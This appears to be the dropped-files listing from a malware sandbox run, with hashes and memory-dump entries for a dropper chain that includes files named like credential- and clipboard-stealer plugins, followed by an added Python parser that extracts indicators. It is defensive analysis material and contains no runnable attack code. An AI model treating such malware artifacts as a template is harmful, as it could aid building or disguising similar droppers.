SHA1 1c9e5066c5dbe55fbf1b3795b67e85e6d70fbcc3
SHA256 da848354446f1cc6fc46269810de327f73e302a3b49bdcf1768f91f55d179773
SHA512 82b5743fc336462220b0a72ed97f3f74ddd131ce5b0cdc5265d73acc5f855b028fc468d0910cca33a27c0959c81ff48fe3cf2462b01dd0672299e0b29071894e

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6KE26pO.exe

MD5 967f94532135f2be66f52826d4bdc0d9
SHA1 c3eac79dc3e4de391edb079fe12a7976ab646be7
SHA256 80a44872835f4b305e8d3c1a42267edfc10e3cdf8ecb5abfe3ada464eb72bce4
SHA512 41d0423f110e7e9580abf5580458ab2884b9b88061ef53426c8e8e9b9cfbb0e056b7cf2bbab6dcedc0fdf20a4105176855d0d2577f34ef537c3c238aaa113777

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW6Zt8oj.exe

MD5 f588c7b47585fe07fcbee10adf071051
SHA1 010a7a0d286dbd95f8969161f7f8d7dae7141b06
SHA256 370526ccbfe24bb127e0c35990f6657a3c0ffcd06bb1ab650916510810aff761
SHA512 0135217f0b916cfd58e5f406c23ad805fd0e62475eaff608a79aedbe48a56ca6c9a9becc42e5650b877ee264a3906565e6c5dfc8f675a2bc198c49a2e579943a

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\iO8uY9pP.exe

MD5 9825ae532965aaf1c8b6eeb23307a0b5
SHA1 45dc12d3e2ae9ff5eea54188faf7f647c5c10560
SHA256 920ba68f618312ec413bef3cb0832e66e60537000f9d2f2d15488d48a3b8ca21
SHA512 56c779df4443822b42dec60de5e5a4fe5281ee82c457b527143d2f400ed9f4e6ec00d016ca4f8b51739d77bdbf6487e195efe85b2646ccd394420ad4d5e48172

C:\Users\Admin\AppData\Local\Temp\674.exe

MD5 87ec79f7a935ac18452e8bf14cee3eaa
SHA1 44ba683c6cf7e938d90f7c01d6fa8f39831c2e22
SHA256 15ac5f7e5fb930fdc48a83d67b79e669a7ebdaed45bbc394c0fddc3ff57d7532
SHA512 a9198d48d3b62a7bc3d0e53b546c41876326ab51406cea1aebadc49aec4c879e8e037686dd3ffabab304e2f66f30ce3f294f63b4054e889269fd5780b1b1f181

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YL1xJ1lt.exe

MD5 31c009b6fb0016ed9858273b31830855
SHA1 aa4432181da3349006a6ad35852705e9fc53e038
SHA256 593b5be11b432dd398461b85ba2ad02c6a49d3e7dee9ddf9becc0f54827d95a0
SHA512 22513cfb2c6d7c40223713e7e33f18058fc619518d845515409a978e6a4e02a7ae9a0dfa5f3c9fd56579e99b6eeb14845e4af897f9cb5297e3fc71f206e76458

C:\Users\Admin\AppData\Local\Temp\674.exe

MD5 87ec79f7a935ac18452e8bf14cee3eaa
SHA1 44ba683c6cf7e938d90f7c01d6fa8f39831c2e22
SHA256 15ac5f7e5fb930fdc48a83d67b79e669a7ebdaed45bbc394c0fddc3ff57d7532
SHA512 a9198d48d3b62a7bc3d0e53b546c41876326ab51406cea1aebadc49aec4c879e8e037686dd3ffabab304e2f66f30ce3f294f63b4054e889269fd5780b1b1f181

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\MR9kh3on.exe

MD5 752628ad18046dcf1135bfb110b4e310
SHA1 cc207f5cdb66bedb7b4d4626c31f42b54b10934b
SHA256 0a30b0514f06dd0fee5ae520c17f5063d1b517ce601a62fddc239714852d0b7b
SHA512 323e44d590d3345f2e01f8b549056f3f1230770af7afdbe66b049dec6918b908cb929cbdce84c7ed47f3e0fc5b3c1db02971d08b93e78bbfc43e9ba29554c59c

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1hY00JA7.exe

MD5 fae7262abd1ec7a8cc8c733bc11ede7c
SHA1 64c197c8c8db30b547463abf726679573c7dc1a4
SHA256 2f3228dfa4c99b6f28a2cbfddac0dca494eff7cf2eb1e3ce61ecc5ccb1bd431d
SHA512 72f132d4a25b5068102686178866039f21f31f1ff20b1346f4d2d91c7c5180378e5de9151d960cc2ea99b16fba3a6645538e89480651c4118a54ed025e21e2dc

C:\Users\Admin\AppData\Local\Temp\8D7.bat

MD5 9db53ae9e8af72f18e08c8b8955f8035
SHA1 50ae5f80c1246733d54db98fac07380b1b2ff90d
SHA256 d1d32c30e132d6348bd8e8baff51d1b706e78204b7f5775874946a7019a92b89
SHA512 3cfb3104befbb5d60b5844e3841bf7c61baed8671191cfc42e0666c6ce92412ab235c70be718f52cfbd0e338c9f6f04508e0fd07b30f9bbda389e2e649c199d1

memory/6116-342-0x0000000000400000-0x0000000000433000-memory.dmp

memory/6116-343-0x0000000000400000-0x0000000000433000-memory.dmp

memory/6116-345-0x0000000000400000-0x0000000000433000-memory.dmp

memory/228-347-0x0000000000400000-0x0000000000433000-memory.dmp

memory/228-348-0x0000000000400000-0x0000000000433000-memory.dmp

memory/228-350-0x0000000000400000-0x0000000000433000-memory.dmp

memory/6116-351-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C04.exe

MD5 02ff7b6ab0166ce70c7a12c5552e00be
SHA1 9d266ab22b438fc8092e7816557196a0e546e24a
SHA256 0a905d1a49ca8141cd03947a03ebd34d5dadaadf2c5ea952ac8125c877ff1644
SHA512 13eec7921721560c318c6f7b1503501e9e91922f4a730a2f0b2b9d143e56392c3e2f9d8084439b4829fad3f925f9b464f346c9fa4673af4622f452a9e9af3cbe

C:\Users\Admin\AppData\Local\Temp\CF0.exe

MD5 57543bf9a439bf01773d3d508a221fda
SHA1 5728a0b9f1856aa5183d15ba00774428be720c35
SHA256 70d2e4df54793d08b8e76f1bb1db26721e0398da94dca629ab77bd41cc27fd4e
SHA512 28f2eb1fef817df513568831ca550564d490f7bd6c46ada8e06b2cd81bbc59bc2d7b9f955dbfc31c6a41237d0d0f8aa40aaac7ae2fabf9902228f6b669b7fe20

memory/6080-360-0x0000000000A00000-0x0000000000A0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9AF.tmp\9B0.tmp\9B1.bat

MD5 0ec04fde104330459c151848382806e8
SHA1 3b0b78d467f2db035a03e378f7b3a3823fa3d156
SHA256 1ee0a6f7c4006a36891e2fd72a0257e89fd79ad811987c0e17f847fe99ea695f
SHA512 8b928989f17f09282e008da27e8b7fd373c99d5cafb85b5f623e02dbb6273f0ed76a9fbbfef0b080dbba53b6de8ee491ea379a38e5b6ca0763b11dd4de544b40

memory/6080-362-0x00007FFE35340000-0x00007FFE35E01000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\E87.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

memory/6036-370-0x0000000074840000-0x0000000074FF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

memory/6036-378-0x0000000007530000-0x0000000007540000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 a1e508404f45c4ac0cb7e1ffd1cdcdfc
SHA1 2354d15e05fa84a2e171887356cc8fc7f0ba51fe
SHA256 5889147550d3bcf136ea4e4541bd55b3e476bd8bde79674a68f94ebe32c5d3b2
SHA512 d46a222c77cffefce89275aaa78bdb9f8e4aa118c00d9897d80d2c625253eceb3744e566adab8f4aa3920df90a69a0565ac8230fb85093d67b2fec2595167414

memory/5948-389-0x00000000004C0000-0x00000000004FE000-memory.dmp

memory/5948-390-0x0000000074840000-0x0000000074FF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Ow203LP.exe

MD5 987883382e8b62c67e13f88307066b15
SHA1 754d95ba9258680c1efd3229aa801218f9d4317f
SHA256 efd94432016e5abc95803c8f4197054c2a176aa580ee8ccd2d16e007cdc1c7d0
SHA512 734772b634ddf758d807d56cfbac4cb76eb752c8dc8247aa6e8e1bb1cee07e09b3b57505661831a49cbbcb8fd15ac82eeeaba8ae6c8c793e463c97e321e4a1bf

memory/5948-402-0x0000000007210000-0x0000000007220000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 bf009481892dd0d1c49db97428428ede
SHA1 aee4e7e213f6332c1629a701b42335eb1a035c66
SHA256 18236c88bc4fe576f82223cca595133aa3b4e5fd24ebac9fd515b70e6f403ab4
SHA512 d05515ff319b0b82030bc9d4a27f0432b613488f945d1dae8b8dfe73c64e651eb39f4141a5d2e157e2afb43dd1dd95b6611c1003ac4e2e80511e6c5cd7cfdf11

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 fde35c3bd20541fc2b097923babbadbd
SHA1 b0e316167faa284db03230fd46759651e2d90f78
SHA256 b298e01d0d4fb92af32c9e74e159c30cba94ec3b033e80a86dbea20a920fd3cd
SHA512 a58ebb719e1e86d0fdda8bdb7e234bbb48eb1e47dc12395038d74ca31b69be93d78de4105af4f8ef64ae07930bf96b890bd296467d1dfef9474a293c3da1f07d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5824aa.TMP

MD5 e81846560b3907dd1f59f6e8ec611b07
SHA1 5380d9be767a4af88afcf46deb1ac9f463248f04
SHA256 55b092b5031e7f7ed883c3cdc7bfd6f9c23fdc4b6d406ea58ddf2b5d1a9db51f
SHA512 9c311995f7e90e455e3f57f99a161a2f11fa594de5d300ef09266534c4b94fd8dc0cfdd7cdcc1640ab5133e9364048bb1bfc683bee226c200ca1bec0b75c69c3

memory/6080-498-0x00007FFE35340000-0x00007FFE35E01000-memory.dmp

memory/6036-499-0x0000000074840000-0x0000000074FF0000-memory.dmp

memory/6080-501-0x00007FFE35340000-0x00007FFE35E01000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 82f2c41e19c217b50634b0c6b1e8f2b3
SHA1 b590a7142849df470c23e58b5b3113e2dafe4dd9
SHA256 26b0cae308543030b21bdf2b069292c133823d59dfcdb9e75801d4b90d8caa96
SHA512 a70669b1ae1171acbd8cb051ce9ea9275aa93864cdb78bfb87ee4bf8ac3e9a7219bad0ea6847bd051d0fb35739c1a2307b0a61a137377d22e7fac570b8ac2d50

memory/5948-511-0x0000000074840000-0x0000000074FF0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 c6e55892008adbd57be1b8a1129bbfbc
SHA1 05bae2a002a0f50469af4b85f835328c1290e217
SHA256 7a293b839dc4e1b3edd9fea8e34b9dc0ffa0439310ae25916c9eb8a81e1ab925
SHA512 87885c796ed0355e4c50605abc357200c79e06bf8e4a1fc4574548a3df8bec05da9e9bc00363586fb3b8c854ebf2c5b58605925962f217d3f169cf43bd8bdf6e

memory/5948-530-0x0000000007210000-0x0000000007220000-memory.dmp

memory/5380-533-0x0000000074840000-0x0000000074FF0000-memory.dmp

memory/5380-534-0x0000000000E10000-0x0000000001D3A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

C:\Users\Admin\AppData\Local\Temp\source1.exe

MD5 e082a92a00272a3c1cd4b0de30967a79
SHA1 16c391acf0f8c637d36a93e217591d8319e3f041
SHA256 eb318c91e0a9f49ad218298a13f7d8981e6ab145097107e5316d857943bc1cdc
SHA512 26b77179a46e1a72dab0cfa99e030133e99057d10e14a36ed3ef4935e7778b0f6505bad43b14523275e7dc5937bb2f5f7c650cb7ec6e7012cbbe874e52c15288

memory/4940-557-0x0000000074840000-0x0000000074FF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/4940-558-0x0000000000D90000-0x00000000012A6000-memory.dmp

memory/4940-565-0x0000000005B70000-0x0000000005B80000-memory.dmp

memory/5380-566-0x0000000074840000-0x0000000074FF0000-memory.dmp

memory/4940-568-0x0000000005B50000-0x0000000005B51000-memory.dmp

memory/4940-567-0x0000000005DC0000-0x0000000005E5C000-memory.dmp

memory/5208-571-0x00000000024F0000-0x00000000024F9000-memory.dmp

memory/5208-572-0x00000000025E0000-0x00000000026E0000-memory.dmp

memory/1720-574-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4108-573-0x0000000004340000-0x0000000004740000-memory.dmp

memory/4108-575-0x0000000004740000-0x000000000502B000-memory.dmp

memory/1720-576-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4940-577-0x0000000074840000-0x0000000074FF0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 990667ca89e2fece1b1f69595dbdd3ac
SHA1 4f154850ccf23ae21a8e6600d4dae98533862b6f
SHA256 dfe67f14a380e50b49a7b84ae8079f139796d9f40aae3b20359c6d41203e68a7
SHA512 621c27ebd66c41cbf72c15e7a94788a848dce868b14909435a8d46934138d05d17a8c5904225844254bfd951c27484be4cc8f498e4bd77b0bcfe9b6e7de04420

memory/4108-587-0x0000000000400000-0x000000000266D000-memory.dmp

memory/4940-588-0x0000000005B70000-0x0000000005B80000-memory.dmp

memory/3116-589-0x0000000003050000-0x0000000003086000-memory.dmp

memory/3116-590-0x0000000074840000-0x0000000074FF0000-memory.dmp

memory/3116-603-0x00000000059F0000-0x0000000006018000-memory.dmp

memory/3172-600-0x0000000006E70000-0x0000000006E86000-memory.dmp

memory/1720-601-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 f7905136deb6ff7069528fe32c85a9ba
SHA1 e801804e17e995ce315d91801471acdc223efad2
SHA256 341573550b02579b3583eb4e130e04cc862f55645dc61166c44b648602416012
SHA512 9086e6dad0f92f6b3dfbe0b5c50639ef75394c8b4f20df68626d9547dbac2024854a3d50ea3e7633bf97ac70493f60e4540626a8751b90fd72c5b9bbcd821a3c

memory/3116-615-0x0000000005870000-0x0000000005892000-memory.dmp

memory/3116-621-0x0000000005920000-0x0000000005986000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_351qhmqy.k0f.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3116-622-0x0000000006090000-0x00000000060F6000-memory.dmp

memory/3116-627-0x0000000006200000-0x0000000006554000-memory.dmp

memory/3116-628-0x0000000006620000-0x000000000663E000-memory.dmp

memory/4108-629-0x0000000004340000-0x0000000004740000-memory.dmp

memory/3116-631-0x0000000007810000-0x0000000007854000-memory.dmp

memory/4108-630-0x0000000000400000-0x000000000266D000-memory.dmp

memory/6008-632-0x00007FF7CCCE0000-0x00007FF7CD281000-memory.dmp

memory/4108-635-0x0000000004740000-0x000000000502B000-memory.dmp

memory/3116-636-0x00000000053B0000-0x00000000053C0000-memory.dmp

memory/4940-640-0x0000000005FF0000-0x0000000006005000-memory.dmp

memory/4940-641-0x0000000005FF0000-0x0000000006005000-memory.dmp

memory/4940-644-0x0000000005FF0000-0x0000000006005000-memory.dmp

memory/4940-646-0x0000000005FF0000-0x0000000006005000-memory.dmp

memory/4820-649-0x00000000020A0000-0x00000000020FA000-memory.dmp

memory/4940-650-0x0000000005FF0000-0x0000000006005000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpB199.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmpB1CE.tmp

MD5 9a24ca06da9fb8f5735570a0381ab5a2
SHA1 27bdb2f2456cefc0b3e19d9be0a0dd64cc13d5de
SHA256 9ef3c0aca07106effa1ad59c2c80e27225b2dd0808d588702dcf1a24d5f5fe00
SHA512 dd8ef799db6b1812c26ddc76b51e0ea3bbd5acde4e470a5e1152868e1aa55aa83b7370486f2d09158ffeda7dc8d95a2b071fe6bd086118efdb2b0d361cbf5183

C:\Users\Admin\AppData\Local\Temp\tmpB209.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\tmpB230.tmp

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Temp\tmpB20F.tmp

MD5 ef0302d09e6704625922099656155a09
SHA1 1d20e5be20e15de7be259c6d94597e8bb04b3e0e
SHA256 3991b1953b9de534ffc22d5b13caecc0c62bedf780a523c0c58cc50720a3f5fa
SHA512 f58c7d55822bda655a6d35b0455a06fc4c5169925059ab8d46e33c1989764ff36bf45e9593da19fccbd4bafc14e86148a95abe77a08b252696ce1e45ef829122

C:\Users\Admin\AppData\Local\Temp\tmpB26B.tmp

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4
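Added example, not part of this report or of the sandbox that produced it: a small parser for the listing format used above. It turns the path-plus-hash blocks into a deduplicated IOC set, flags SHA256 values that appear under more than one path (the dropper writing itself to a second location, as E87.exe and fefffe8cea\explothe.exe above share every hash), and groups the memory/PID-index-start-end dump names by process so that an identical (base, size) region in different PIDs stands out (6116 and 228 above both carry 0x400000-0x433000). Reading the dump-name fields as PID, event index and region bounds is an assumption about the report format; the SAMPLE string is a constructed excerpt of the entries above with the SHA512 lines left out.

```python
"""Parse a sandbox report's Files listing into dropped-file IOCs and memory regions.

Added example, not part of the original report. Assumed input format: a file path followed
by MD5/SHA1/SHA256/SHA512 lines, and memory/<pid>-<index>-<start>-<end>-memory.dmp lines
(reading those name parts as PID, event index and region bounds is an assumption).
"""
import re
from collections import Counter, defaultdict

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512) ([0-9a-f]+)$")
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

# Constructed sample: a short excerpt of the listing above (SHA512 lines omitted),
# with one entry repeated verbatim as such listings often are.
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\E87.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966

memory/6116-342-0x0000000000400000-0x0000000000433000-memory.dmp

memory/228-347-0x0000000000400000-0x0000000000433000-memory.dmp

memory/4940-558-0x0000000000D90000-0x00000000012A6000-memory.dmp
"""


def parse_files_section(text):
    """Return (entries, duplicates, memory): path -> distinct hash dicts seen for it,
    path -> number of verbatim repeats collapsed, pid -> [(index, start, end)]."""
    entries, duplicates, memory = defaultdict(list), Counter(), defaultdict(list)
    path, hashes = None, {}

    def commit():
        nonlocal path, hashes
        if path is not None:
            if hashes in entries[path]:
                duplicates[path] += 1        # verbatim repeat of an entry already recorded
            else:
                entries[path].append(hashes)
        path, hashes = None, {}

    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue                         # blank lines only separate a path from its hashes
        m = MEM_RE.match(line)
        if m:
            commit()
            pid, idx, start, end = m.groups()
            memory[int(pid)].append((int(idx), int(start, 16), int(end, 16)))
            continue
        h = HASH_RE.match(line)
        if h:
            if path is not None:             # an orphan hash line has nothing to attach to
                hashes[h.group(1)] = h.group(2)
            continue
        commit()                             # anything else starts a new file entry
        path = line
    commit()
    return dict(entries), dict(duplicates), dict(memory)


def self_copies(entries):
    """SHA256 values written under more than one path: one binary copied to a new name."""
    paths_by_sha = defaultdict(set)
    for path, variants in entries.items():
        for h in variants:
            if "SHA256" in h:
                paths_by_sha[h["SHA256"]].add(path)
    return {sha: sorted(p) for sha, p in paths_by_sha.items() if len(p) > 1}


def shared_regions(memory):
    """(base, size) pairs dumped from more than one PID: the same image in several processes."""
    owners = defaultdict(set)
    for pid, regions in memory.items():
        for _, start, end in regions:
            owners[(start, end - start)].add(pid)
    return {k: sorted(v) for k, v in owners.items() if len(v) > 1}


if __name__ == "__main__":
    files, dups, mem = parse_files_section(SAMPLE)
    print(len(files), "distinct paths,", sum(dups.values()), "repeats collapsed")
    print("same content under several paths:", self_copies(files))
    print("regions shared across PIDs:", shared_regions(mem))
```

Run it as a script for the summary over the sample, or pass the whole Files section to parse_files_section to do the same over the full report. When pivoting to other systems, match on the content hashes rather than on the Temp file names: names such as E87.exe and C04.exe are generated at run time and need not repeat, while the SHA256 of the written payload does.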